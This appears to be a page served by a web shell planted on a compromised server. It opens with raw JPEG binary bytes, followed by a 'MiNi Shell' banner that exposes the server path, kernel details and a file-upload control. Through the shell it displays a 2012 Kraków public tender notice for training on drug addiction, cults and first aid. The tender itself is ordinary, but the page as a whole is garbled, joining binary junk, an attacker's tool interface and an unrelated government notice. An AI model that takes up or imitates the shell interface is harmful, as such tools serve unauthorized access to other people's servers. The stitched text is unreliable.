JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121031/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121031/428574-N-2012.html

<p class="kh_header"><b>Kraków: Zorganizowanie i przeprowadzenie szkoleń związanych z realizacją projektu w zakresie Programu Poprawy Bezpieczeństwa dla Miasta Krakowa pod nazwą Bezpieczny  Kraków</b><br>
<b>Numer ogłoszenia: 428574 - 2012; data zamieszczenia: 31.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń związanych z realizacją projektu w zakresie Programu Poprawy Bezpieczeństwa dla Miasta Krakowa pod nazwą Bezpieczny  Kraków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I część zamówienia
CPV: 80.51.00.00-2 Usługi szkolenia specjalistycznego
Przedmiotem   zamówienia   jest   zorganizowanie   i   przeprowadzenie   zajęć   z   zakresu problematyki uzależnienia od narkotyków, według poniższych wytycznych:
1.	Program zajęć musi zawierać następujące zagadnienia:
1)	zasoby rynku narkotykowego,
2)	formy występowania oraz drogi wprowadzania narkotyków do organizmu,
3)	postrzeganie objawy występujące po przyjęciu środków działających depresyjnie, pobudzająco oraz halucynogennych,
4)	substancje psychoaktywne jako środki ułatwiające dokonanie przestępstw oraz substancje w organizmie uczestników ruchu drogowego,
5)	interpretacja  wyników   ogólnie   dostępnych  testów  do   wykrywania   środków odurzających i substancji psychotropowych,
6)	prezentację substancji psychoaktywnych dostępnych na rynku,
7)	omówienie właściwości fizykochemicznych narkotyków,
8)	pokaz testerów do wykrywania narkotyków w moczu i ślinie,
9)	analiza wyników ww. testów.

2.	Zajęcia przeznaczone są dla 70 uczestników.
3.	Zajęcia odbywać się będą w dwóch grupach warsztatowych, po ok. 35 osób. Wykłady odbędą się w jednej grupie.
4.	Zajęcia zostaną przeprowadzone w wymiarze 8 godzin dydaktycznych (45-minutowych) dla każdej grupy warsztatowej. Wykłady zostaną przeprowadzone w wymiarze 3 godzin dydaktycznych (45 -minutowych).
5.	Zajęcia odbędą się w lokalu zapewnionym przez Wykonawcę, znajdującym się w granicach administracyjnych Krakowa, w odległości nie większej niż 1 km od najbliższego przystanku komunikacji zbiorowej.
6.	Wykonawca zobowiązany jest:

1)	wydać wszystkim uczestnikom materiały szkoleniowe oraz zaświadczenia potwierdzające ukończenie zajęć zawierające imię i nazwisko uczestnika, zakres tematyczny zajęć oraz liczbę godzin przeprowadzonych zajęć.
2)	zapewnić każdemu uczestnikowi serwis kawowy w postaci: ciastek konferencyjnych (150g), kawy (250 ml), soków owocowych (250 ml), wody mineralnej (250 ml) cukier oraz mleczko do kawy,
3)	dostarczyć Zamawiającemu rejestr wydanych zaświadczeń,
4)	dostarczyć Zamawiającemu dziennik szkoleń potwierdzający odbycie szkolenia ze szczegółowym programem.

7.	Termin realizacji szkolenia: od dnia podpisania umowy do 15 grudnia 2012 roku.
8.	Wykonawca musi dysponować osobą zdolną do wykonania przedmiotu zamówienia, tj. specjalistą ds. terapii uzależnień lub lekarzem posiadającym specjalizację z zakresu toksykologii klinicznej. Wykonawca musi posiadać doświadczenie w prowadzeniu zajęć z zakresu problematyki uzależnienia od narkotyków w wymiarze nie mniejszym niż 8 godzin w okresie trzech lat przed złożeniem oferty, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
 
II część zamówienia
CPV: 80.51.00.00-2 Usługi szkolenia specjalistycznego
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia na temat grup stosujących psychomanipulację, według poniższych wytycznych:
1.	Program zajęć musi zawierać następujące zagadnienia:
1)	zdefiniowanie pojęcia sekta w różnych ujęciach: socjologicznym, religioznawczym i językowym;
2)	czym jest psychomanipulacja
3)	grupy stosujące psychomanipulację - skala zjawiska, przyczyny;
4)	rodzaje grup działających na terenie Polski, stosujących psychomanipulację;
5)	sposoby werbowania i metody działania grup stosujących psychomanipulację;
6)	przyczyny i konsekwencje wiązania się z grupami stosującymi psychomanipulację;
7)	specyfika, metody działania ww. grup
8)	społeczne zagrożenia wieku szkolnego
9)	praktyczne rady dla wychowawców

2.	W zajęciach weźmie udział 70 uczestników.
3.	Zajęcia przeprowadzone będą w formie wykładowej, odbędą się w dwóch grupach, po ok. 35 osób.
4.	Zajęcia przeprowadzone zostaną w wymiarze 2,5 godziny dydaktycznej (45-minutowej) dla każdej z grup.
5.	Zajęcia odbędą się w lokalu zapewnionym przez Wykonawcę, znajdującym się w granicach administracyjnych Krakowa, w odległości nie większej niż 1 km od najbliższego przystanku komunikacji zbiorowej.
6.	Wykonawca zobowiązany jest:

1)	wydać wszystkim uczestnikom materiały szkoleniowe oraz zaświadczenia potwierdzające ukończenie zajęć zawierające imię i nazwisko uczestnika, zakres tematyczny zajęć oraz liczbę godzin przeprowadzonych zajęć.
2)	zapewnić każdemu uczestnikowi serwis kawowy w postaci: ciastek konferencyjnych (150g), kawy (250 ml), soków owocowych (250 ml), wody mineralnej (250 ml) cukier oraz mleczko do kawy,
3)	dostarczyć Zamawiającemu rejestr wydanych zaświadczeń,
4)	dostarczyć Zamawiającemu dziennik szkoleń potwierdzający odbycie szkolenia ze szczegółowym programem

7.	Termin realizacji usługi: od dnia podpisania umowy do 15 grudnia 2012 roku.
8.	Wykonawca musi dysponować osobą zdolną do wykonania przedmiotu zamówienia, tj. pedagogiem lub psychologiem, posiadającym doświadczenie w pracy z osobami mającymi styczność z grupami stosującymi psychomanipulację (sekty itp.) Wykonawca musi posiadać doświadczenie w prowadzeniu zajęć z zakresu problematyki grup stosujących psychomanipulację w wymiarze nie mniejszym niż 5 godzin w okresie trzech lat przed złożeniem oferty, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
 
III część zamówienia
CPV: 80.51.00.00-2 Usługi szkolenia specjalistycznego
Przedmiotem  zamówienia jest  zorganizowanie   i  przeprowadzenie   szkolenia  z  zakresu udzielania pierwszej pomocy przedmedycznej, według poniższych wytycznych:
1.	Program szkolenia musi zawierać następujące zagadnienia:
1)	wypadki komunikacyjne,
2)	stwierdzenie stanu przytomności poszkodowanego,
3)	postępowanie z osobą nieprzytomną,
4)	postępowanie przy krwotokach, ranach, ciałach obcych w ranach,
5)	postępowanie przy przeprowadzaniu resuscytacji krążeniowo - oddechowej,
6)	postępowanie w przypadku padaczki,
7)	postępowanie w przypadku zakrztuszenia,
8)	postępowanie w przypadku zawału,
9)	postępowanie w przypadku cukrzycy,
10)	postępowanie w przypadku porażenia prądem elektrycznym,
11)	postępowanie w przypadku oparzenia
12)	postępowanie w przypadku urazu kończyn

2.	Szkolenie przeznaczone dla 70 uczestników.
3.	Szkolenie przeprowadzone zostanie w formie warsztatowej, odbędzie się w czterech grupach.
4.	Szkolenie zostanie przeprowadzone w wymiarze 4,5 godzin dydaktycznych (45-minutowych) dla każdej z grup.
5.	Zajęcia odbędą się w lokalu zapewnionym przez Wykonawcę, znajdującym się w granicach administracyjnych Krakowa, w odległości nie większej niż 1 km od najbliższego przystanku komunikacji zbiorowej.
6.	Wykonawca zobowiązany jest:

1)	wydać wszystkim uczestnikom materiały szkoleniowe oraz zaświadczenia potwierdzające ukończenie zajęć zawierające imię i nazwisko uczestnika, zakres tematyczny zajęć oraz liczbę godzin przeprowadzonych zajęć.
2)	zapewnić każdemu uczestnikowi serwis kawowy w postaci: ciastek konferencyjnych (150g), kawy (250 ml), soków owocowych (250 ml), wody mineralnej (250 ml) cukier oraz mleczko do kawy,
3)	dostarczyć Zamawiającemu rejestr wydanych zaświadczeń,
4)	dostarczyć Zamawiającemu dziennik szkoleń potwierdzający odbycie szkolenia ze szczegółowym programem.

7.	Termin realizacji usługi: od dnia podpisania umowy do 15 grudnia 2012 roku.
8.	Wykonawca musi dysponować osobą zdolną do wykonania przedmiotu zamówienia tj. osobą posiadającą kwalifikacje zawodowe ratownika medycznego lub lekarza medycyny. Wykonawca lub osoba zdolna do wykonania przedmiotu zamówienia musi posiadać doświadczenie w prowadzeniu zajęć z zakresu udzielania pierwszej pomocy przedmedycznej w wymiarze nie mniejszym niż 9 godzin w okresie trzech lat przed złożeniem oferty, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 łat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak:

1)	termin   realizacji   zamówienia,   jeżeli   zmiana   terminu   nie   jest   spowodowana okolicznościami leżącymi po stronie Wykonawcy,
2)	warunki płatności,
3)	miejsce realizacji zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie Adres: ul. Józefińska 14
30-529 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2012 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Krakowie Adres: ul. Józefińska 14
30-529 Kraków, Dziennik Podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com